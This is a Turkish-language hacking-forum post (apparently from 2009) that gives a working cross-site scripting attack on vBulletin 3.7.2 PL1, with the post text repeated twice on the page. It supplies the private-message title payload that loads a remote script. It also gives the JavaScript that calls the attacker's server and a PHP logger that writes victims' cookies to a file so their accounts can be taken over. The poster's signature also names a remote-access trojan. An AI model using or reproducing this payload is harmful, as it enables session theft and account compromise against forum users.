Vbulletin 3.7.2'de Açık - CryptoSuite.ORG || The Best Encryption Platform Of The World

ZeeK · 06-24-09, 07:51

Vbulletin 3.7.2 PL1'de Açık!
___________________

Popüler forum scriptinde bulunan yeni bir açık ile aşağıdaki şekilde herhang bir kullanıcıya pm gönderdiğinizde, alıcı kullanıcının cookieleri sizin sunucunuzda saklanacaktır.

Kullanımı: Şu başlıkla bir pm gönderin:
--></script><script src="http://www.siteadresiniz.com/vbcal.js"></script><!--

Yukarıdaki satırı tam olarak girin eksik-fazla yok.

Ve siteadresiniz.com da vbcal.js dosyasını şu şekilde oluşturun:

Kod:

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://www.siteadresiniz.com/vbcal-kayit.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();

Ve de siteadresiniz.com/vbcal-kayit.php dosyası oluşturun şu kodlarla:

Kod:

<?
$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
        $all_cookies .= "$cookie_name=$cookie_value, ";
}
rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n", 
FILE_APPEND);
?>

Php dosyanızı kayıt ettikten sonra iplog.txt dosyasına chmod 755 yapmayı unutmayın.

İşleyişi: Pm gönderdiğiniz kullanıcı sizden gelen mesajı okuduğunda javascript ile siteadresiniz.com/vbcal-kayit.php yi çalıştıracak, o da saldırı yaptığınız domaindeki cookie bilgilerini alıp iplog.txt dosyasına aktaracak. Ardından aldığınız verileri kullanıp kullanıcının şifresini kurabilirsiniz.

Vbulletin sahipleri güncel versiyonu yüklerseniz sorun kalmayacaktır..

Konu Bilgileri
	Konu Başlığı Vbulletin 3.7.2'de Açık	Konudaki Cevap Sayısı 0
	Şuan Bu Konuyu Görüntüleyenler	Görüntülenme Sayısı 193

06-24-09, 07:51	#1 (permalink)
ZeeK Member User ID : 1918 Messages : 9 Threads : 4 Thanks : 2 Rat : Turkojan CryptoSuite.Org	Vbulletin 3.7.2'de Açık Vbulletin 3.7.2 PL1'de Açık! ___________________ Popüler forum scriptinde bulunan yeni bir açık ile aşağıdaki şekilde herhang bir kullanıcıya pm gönderdiğinizde, alıcı kullanıcının cookieleri sizin sunucunuzda saklanacaktır. Kullanımı: Şu başlıkla bir pm gönderin: --></script><script src="http://www.siteadresiniz.com/vbcal.js"></script><!-- Yukarıdaki satırı tam olarak girin eksik-fazla yok. Ve siteadresiniz.com da vbcal.js dosyasını şu şekilde oluşturun: Kod: var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); XmlHttp.open("GET","http://www.siteadresiniz.com/vbcal-kayit.php",false); XmlHttp.setRequestHeader("Host","attacker"); XmlHttp.send(); Ve de siteadresiniz.com/vbcal-kayit.php dosyası oluşturun şu kodlarla: Kod: <? $all_cookies = ""; foreach ($_COOKIE as $cookie_name => $cookie_value) { $all_cookies .= "$cookie_name=$cookie_value, "; } rtrim($all_cookies, ", "); file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n", FILE_APPEND); ?> Php dosyanızı kayıt ettikten sonra iplog.txt dosyasına chmod 755 yapmayı unutmayın. İşleyişi: Pm gönderdiğiniz kullanıcı sizden gelen mesajı okuduğunda javascript ile siteadresiniz.com/vbcal-kayit.php yi çalıştıracak, o da saldırı yaptığınız domaindeki cookie bilgilerini alıp iplog.txt dosyasına aktaracak. Ardından aldığınız verileri kullanıp kullanıcının şifresini kurabilirsiniz. Vbulletin sahipleri güncel versiyonu yüklerseniz sorun kalmayacaktır.. Konu ZeeK tarafından (06-25-09 Saat 04:48 ) değiştirilmiştir..

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)